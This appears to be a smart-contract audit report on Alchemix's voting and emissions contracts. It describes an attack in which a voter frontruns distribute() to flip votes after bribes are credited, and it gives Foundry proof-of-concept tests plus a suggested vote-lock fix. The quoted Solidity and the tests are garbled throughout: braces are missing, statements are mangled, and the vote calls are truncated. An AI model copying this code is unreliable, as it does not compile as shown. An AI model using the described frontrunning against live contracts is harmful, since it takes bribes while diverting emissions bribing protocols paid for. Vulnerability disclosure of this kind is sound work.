function _vote(uint256 _tokenId, address[] memory _poolVote, uint256[] memory _weights, uint256 _boost) internal {
uint256 _poolCnt = _poolVote.length;
uint256 _totalVoteWeight = 0;
uint256 _totalWeight = 0;
for (uint256 i = 0; i < _poolCnt; i++) {
_totalVoteWeight += _weights[i];
uint256 totalPower = (IVotingEscrow(veALCX).balanceOfToken(_tokenId) + _boost);
for (uint256 i = 0; i < _poolCnt; i++) {
address _pool = _poolVote[i];
address _gauge = gauges[_pool];
require(isAlive[_gauge], "cannot vote for dead gauge");
uint256 _poolWeight = (_weights[i] * totalPower) / _totalVoteWeight; // <==
require(votes[_tokenId][_pool] == 0, "already voted for pool");
require(_poolWeight != 0, "cannot vote with zero weight");
weights[_pool] += _poolWeight;
votes[_tokenId][_pool] += _poolWeight;
IBribe(bribes[_gauge]).deposit(uint256(_poolWeight), _tokenId); // <==
_totalWeight += _poolWeight;
emit Voted(msg.sender, _pool, _tokenId, _poolWeight);
if (_totalWeight > 0) IVotingEscrow(veALCX).voting(_tokenId);
totalWeight += uint256(_totalWeight);
usedWeights[_tokenId] = uint256(_totalWeight);
lastVoted[_tokenId] = block.timestamp;
// Update flux balance of token if boost was used
if (_boost > 0) {
IFluxToken(FLUX).updateFlux(_tokenId, _boost);
Actual distribution of emissions to gauges happens after EPOCH_END + X. There is a delay between the end of the epoch and when the rewards are distributed to the gauges. Although there could be a keeper bot which will be sending distribute() tx right at the start of next epoch, but this tx can always be frontrun by voters to take advantage from.
functiondistribute() external {uint256 start =0;uint256 finish = pools.length;for (uint256 x = start; x < finish; x++) {// We don't revert if gauge is not alive since pools.length is not reducedif (isAlive[gauges[pools[x]]]) {_distribute(gauges[pools[x]]); } }IMinter(minter).updatePeriod();}
function_distribute(address_gauge) internal {// Distribute once after epoch has endedrequire( block.timestamp >=IMinter(minter).activePeriod() +IMinter(minter).DURATION(),"can only distribute after period end" );uint256 _claimable = claimable[_gauge];// Reset claimable amount claimable[_gauge] =0;_updateFor(_gauge);if (_claimable >0) {IBaseGauge(_gauge).notifyRewardAmount(_claimable); }IBribe(bribes[_gauge]).resetVoting();emitDistributeReward(msg.sender, _gauge, _claimable);}
As we can see in distribute(), rewards (stored in claimable[gauge]) from previous epoch are sent to the gauge and its then cleared. Later _updateFor(gauge) is called to update the claimable[gauge] mapping with any accrued reward (reward emission) from previous epoch. This updated rewards in claimable can only be claimed in the next epoch.
functionupdatePeriod() externalreturns (uint256) {require(msg.sender ==address(voter),"not voter");uint256 period = activePeriod;if (block.timestamp >= period + DURATION && initializer ==address(0)) {// Only trigger if new epoch period = (block.timestamp / DURATION) * DURATION; activePeriod = period; epochEmissions =epochEmission();uint256 veAlcxEmissions =calculateEmissions(epochEmissions, veAlcxEmissionsRate);uint256 timeEmissions =calculateEmissions(epochEmissions, timeEmissionsRate);uint256 treasuryEmissions =calculateEmissions(epochEmissions, treasuryEmissionsRate);uint256 gaugeEmissions = epochEmissions.sub(veAlcxEmissions).sub(timeEmissions).sub(treasuryEmissions);uint256 balanceOf = alcx.balanceOf(address(this));if (balanceOf < epochEmissions), epochEmissions - balanceOf);// Set rewards for next epoch rewards -= stepdown;// Adjust updated emissions total supply += rewards;// Once we reach the emissions tail stepdown is 0if (rewards <= TAIL_EMISSIONS_RATE) { stepdown =0; }// If there are no votes, send emissions to veALCX holdersif (voter.totalWeight() >0) { alcx.approve(address(voter), gaugeEmissions); voter.notifyRewardAmount(gaugeEmissions); // <== } else { veAlcxEmissions += gaugeEmissions; }// Logic to distrubte minted tokensIERC20(address(alcx)).safeTransfer(address(rewardsDistributor), veAlcxEmissions); rewardsDistributor.checkpointToken(); // Checkpoint token balance that was just minted in rewards distributor rewardsDistributor.checkpointTotalSupply(); // Checkpoint supplyIERC20(address(alcx)).safeTransfer(address(timeGauge), timeEmissions); timeGauge.notifyRewardAmount(timeEmissions);IERC20(address(alcx)).safeTransfer(treasury, treasuryEmissions); revenueHandler.checkpoint();emitMint(msg.sender, epochEmissions, supply); }return period;}
Once the reward distribution over, distribution of emission to gauge will be executed using Minter.updatePeriod(). Those emitted rewards are sent to Voter contract.
Things to note here is that
Bribes will be awarded based on voting power at EPOCH_END - 1, but Voter.distribute() can be called at a time after EPOCH_END.
Some voters may switch their votes before their votes influences emission, causing voter to receive bribes, but bribing protocol to not have received their gauge emissions.
Attack Scenario:
Lets say some Protocol X wants to bribe for an epoch, expecting reward emission for their Gauge A.
Epoch 1: Voter votes for Gauge A and earns bribes.
End of Epoch 1 (EPOCH_END - 1): Voter's vote is still for Gauge A, bribes calculated.
After EPOCH_END + X: Voter switches vote to Gauge B and then allowing distribution of rewards to gauges. This is possible by frontrunning distribute transaction.
Result: Voter receives bribes intended for Gauge A of an epoch, but emissions are now directed to Gauge B instead of Gauge A, causing an imbalance. This means that Gauge A does not receive the emissions it was supposed to get based on the bribes it paid for, while the voter still collects the bribes.
The voter can effectively "double dip" by getting bribes from Gauge A and then directing the actual emissions (rewards) to Gauge B, potentially exploiting the system to maximize their gains. Bribing protocols expect their bribes to translate into emissions for their gauges. This manipulation disrupts that expectation. Due to this, there is a risk of losing such partners.
It should have some small window of say 1 hours at the start of each epoch to prevent any vote switching and allowing keeper bot to distribute rewards before any vote flipping could happened.
To show difference between two scenarios mentioned below, we have written two test cases, namely: testStealingEmittedRewardsBugDistributeBeforeVote() and testStealingEmittedRewardsBugVoteBeforeDistribute().
vote before distribute (Incorrect Order)
distribute before vote (Correct Order)
Steps to Run using Foundry:
Paste following foundry code in src/test/Voting.t.sol
Both mentioned test cases cab be run using FOUNDRY_PROFILE=default forge test --fork-url $FORK_URL --fork-block-number 17133822 --match-contract VotingTest --match-test testStealingEmittedRewardsBug -vv
functiontestStealingEmittedRewardsBugDistributeBeforeVote() public {uint256 period = minter.activePeriod();// Create a veALCX token and vote to trigger voter rewardsuint256 tokenId =createVeAlcx(admin, TOKEN_1, MAXTIME,false);address sushiBribeAddress = voter.bribes(address(sushiGauge));createThirdPartyBribe(sushiBribeAddress, bal, TOKEN_100K);address[] memory pools =newaddress[](1); pools[0] = sushiPoolAddress;uint256[] memory weights =newuint256[](1); weights[0] =5000;address[] memory bribes =newaddress[](1); bribes[0] =address(sushiBribeAddress);address[][] memory tokens =newaddress[][](2); tokens[0] =newaddress[](1); tokens[0][0] = bal;address[] memory gauges =newaddress[](2); gauges[0] =address(sushiGauge); gauges[1] =address(balancerGauge); console.log("\nBefore 1st vote:"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));// Vote to trigger voter rewards for sushiGauge hevm.prank(admin);, pools, weights,0); console.log("\nAfter 1st vote:"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));// Move forward a epoch relative to period to distribute hevm.warp(period + nextEpoch); voter.distribute(); voter.updateFor(gauges); console.log("\nAfter 1st distribute and updateFor (+EPOCH):"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));// skip epoch to initiate attack period = minter.activePeriod(); hevm.warp(period + nextEpoch); voter.distribute(); voter.updateFor(gauges); console.log("\nAfter 2nd distribute and updateFor (+EPOCH):"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));// Before distribute, flip vote pools[0] = balancerPoolAddress; hevm.prank(admin);, pools, weights,0);// distribute executed after vote flip console.log("\nAfter 2nd vote flip:"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));assertTrue(voter.claimable(address(sushiGauge)) >0);assertTrue(voter.claimable(address(balancerGauge)) ==0);}functiontestStealingEmittedRewardsBugVoteBeforeDistribute() public {uint256 period = minter.activePeriod();// Create a veALCX token and vote to trigger voter rewardsuint256 tokenId =createVeAlcx(admin, TOKEN_1, MAXTIME,false);address sushiBribeAddress = voter.bribes(address(sushiGauge));createThirdPartyBribe(sushiBribeAddress, bal, TOKEN_100K);address[] memory pools =newaddress[](1); pools[0] = sushiPoolAddress;uint256[] memory weights =newuint256[](1); weights[0] =5000;address[] memory bribes =newaddress[](1); bribes[0] =address(sushiBribeAddress);address[][] memory tokens =newaddress[][](2); tokens[0] =newaddress[](1); tokens[0][0] = bal;address[] memory gauges =newaddress[](2); gauges[0] =address(sushiGauge); gauges[1] =address(balancerGauge); console.log("\nBefore 1st vote:"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));// Vote to trigger voter rewards for sushiGauge hevm.prank(admin);, pools, weights,0); console.log("\nAfter 1st vote:"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));// Move forward a epoch relative to period to distribute hevm.warp(period + nextEpoch); voter.distribute(); voter.updateFor(gauges); console.log("\nAfter 1st distribute and updateFor (+EPOCH):"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));// skip epoch to initiate attack period = minter.activePeriod(); hevm.warp(period + nextEpoch);// Before distribute, flip vote pools[0] = balancerPoolAddress; hevm.prank(admin);, pools, weights,0);// distribute executed after vote flip console.log("\nAfter 2nd vote flip (+EPOCH):"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge))); voter.distribute(); voter.updateFor(gauges); console.log("\nAfter 2nd distribute and updateFor:"); console.log("claimable[sushiGauge]:", voter.claimable(address(sushiGauge))); console.log("claimable[balancerGauge]:", voter.claimable(address(balancerGauge)));assertFalse(voter.claimable(address(sushiGauge)) >0);assertFalse(voter.claimable(address(balancerGauge)) ==0);}